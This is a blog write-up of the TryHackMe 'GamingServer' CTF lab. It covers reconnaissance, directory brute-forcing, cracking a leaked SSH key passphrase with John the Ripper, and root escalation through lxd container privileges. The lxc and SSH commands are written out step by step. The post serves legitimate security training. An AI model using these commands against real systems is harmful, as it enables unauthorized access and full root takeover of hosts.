Open in app

Sign in

Write

Sign in

GamingServer WriteUp | TryHackMe

Onurcan Genç
7 min readFeb 26, 2024

--

Hi everyone today I will analyse the machine called GamingServer. Before I start to port scan, I will approach manually for the existence of web app.

1. Using direct acces through URL & Curl

as you can see here we have web app.
  • I will send curl payload using -v parameter (verbose) since I want to get detailed information.
the most interesting part in curl output.
  • After a deeper analysis, I recognized that there was a command and it seems like a user of the system.

1.2 Manuel approach:

you can also use browser to get same results.

2) Understanding the technology behind the system

  • In order to understand the technologies that the system is using, we will use another tool called whatweb which allows us to bring the related technologies that works on the web app. This is called web scanner.
you can directly give the url whether it is an IP address or not.
  • As you can see below, it shows us the same ,but related data that we need to get. Even if the curl command can demonstrates the same conclusions about the web app, whatweb web scanner gives us most necessary information in our pentest operations.
  • The whatweb is mostly useful before we start real network scans because it does not invoke nmap’s network noise. Furthermore, we can get the web apps server’s type, OS info and so on.

3) Port Scanning

  • I often use this payload especially in CTF’s. Because of my department network bandwidth, I am going to use just version scan instead of applying all ports & script scan.

nmap -sV -sC -p- Ip-Address

NMAP SCAN RESULT:

  • Meanwhile, you can also apply directory bruteforce scan using gobuster, dirbuster, wffuz
  • You can use the following payload to begin directory discovery.
Thanks to my department, I can search fast xD

GoBuster Scan Result:

  • The same issue was occured. Thanks to my department’s network bandwidth, I was not able to scan properly. However, we have also juicy information.
I will check the status code: 200, 301

/robots.txt

as you can see here: According to robots.txt, we are allowed to search /uploads/

/uploads

  • Yess ! we have more juicy information.

3.1) Gathering all juicy data !

  • There is a dictionary list for maybe the both username or password
  • I am not interested to read all the text. Instead of reading this let’s check it out what we have remain in the directory bruteforce result.
  • I found that there is also another path to redirect us to /secret path.
Status: 301 means that persistent redirection through another path in the web app. In short, the new location assigned fo this path. After all, new users will be redirect here.

/secret

most probably we will encounter with SSH pair :) (%90 private key)
  • Gothca ! I saw there is an authentication mechanism in the secretKey.
SSH private key

4) Pre-Exploitation

  • Let’s check what we have up to now.

1- SSH private key

2- Dictionary list

3- Comment on html which includes user john

  • We have the opportunity to use john as a user and bruteforce our ssh key with dictionary list so as to crack our private key passphrase.

1- Apply ssh2john.py

  • In order to make our private key pair as a john’s bruteforce format, we are going to start the ssh2john.py.
ssh2john
  • I just tried to get what will we get in order to use that Python script.
it says that we have to just add related path and execute this command.
  • Lets download required files
wget is another useful method for automation or downloading process.
> operator imports all the correlated data to id_rsa.txt
I wanted to add this as a proof of concept.
  • Let’s BruteForce through John

Normally, yesterday I was able to crack the password using wordlist. However, today I will switch my device to another device to crack required file. Moreover, you can also use crackstation or other sites that stores same hash databases.

  • As you can see here letmein is our passphrase to authenticate our ssh session.
SSH client warns us to give necessary file permissions for our private key. It says that 0644 which is default permissions for any plain text permission.
  • Let me change the permissions using following command.
chmod 600 secretKey
  • Yes it works. After all this approach SSH allow us to connect using -i parameter.
ssh -i secretKey john@10.10.166.23
we are the john user at that point
  • Lets check for what we can do as a John :)

5) Post-Exploitation

  • We have automated (Linpeas) & manuel scan (just scan through many directories) options.
  • I do not like automated approach at first just use many options what we can run or what are our user, group and other users that are running on related OS.
  • The most interesting part that I see here is that LXD which is container structure in Linux like operating systems.
  • LXD allows us to implement containers on Linux OS it is a container service on that operating system.

After a bit search, I found a repo on GitHub mostly talking about the container vulnerability:

GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD

Build Alpine Linux images for LXD. Contribute to saghul/lxd-alpine-builder development by creating an account on…

github.com

After resource is also useful ->

lxd/lxc Group - Privilege escalation

D-Bus Enumeration & Command Injection Privilege Escalation

book.hacktricks.xyz

  • We have to deploy the Alpine Linux distro on our target & configure the container as below:
security.privileged=true

5.1) Downloading & Uploading process of our Alpine Image

  • I will add step by step all the commands that you need to apply:
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
  • After all the Alpine distro will be implemented and zipped through .tar.gz
it has already generated.
  • We have to send it to our machine to deploy and configure our fully brand-new container image.

Let’s open Python web-server in order to upload our alpine image on our target server

python3 -m http.server [the port that you would like]

Note: do not add [ ] when you desire to execute command.

  • As you can see below I manually access my local machine through browser like a web server. I applied this method since I do not want to deal with the correct path while uploading the Alpine Image
I have already created related files for escalation which are incus.tar.xz, rootfs.squashfs

Note: Do not start with https:// protocol since we do not wish to access under SSL/TLS. That’s why start our command http://

I will apply this commands for our target.

(https://github.com/carlospolop/hacktricks/blob/master/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)

The inventor of the linpeas has a lxd related topic at the same repo.

sudo su
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

This code segment prepares to Linux image distros for us automatically.

  • I want to download required files from my target machine
using wget it is much easier to get files directly our local.
Same approach for the rootfs.squashfs

rootfs.squashfs

rootfs : The root filesystem (rootfs) is the foundation of a container’s file system

squashfs: SquashFS is a compressed, read-only file system format commonly used in cloud containers.

In below, we will import our container image on target machine and set the privileged user option true so that we will be authenticated as a root user.

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

# Check the image is there
lxc image list

# Create the container
lxc init alpine privesc -c security.privileged=true

# List containers
lxc list

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

I will deploy my container on /mnt/root path and added host as a root user.

6) Privilege Escalation

To be able to grant our user to root. We have to execute our container alpine service on target.

lxc start privesc
lxc exec privesc /bin/sh
# cd /mnt/root #Here is where the filesystem is mounted

We said that you need to start as a /bin/sh shell on target and move the base file system.

  • Executing first command applies only the privilege escalated rule which was security.privileged=true
  • The other one starts the termination process on target:

7) Final Output & Flag Location

as you can see we got the privileged user.
  • First Approach
you can move in the machine through command by command.
  • Second Approach
You can use pipe operation in other CTFs. However, my machine cannot execute the second command

“Thank you for reading and reviewing my page”

Ctf
Writeup
Web Server Security
Web Application Security

--

--

Onurcan Genç
Onurcan Genç

Written by Onurcan Genç

175 Followers
140 Following

Offensive Security Specialist | Tech Enthusiast Welcome to my playground !

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams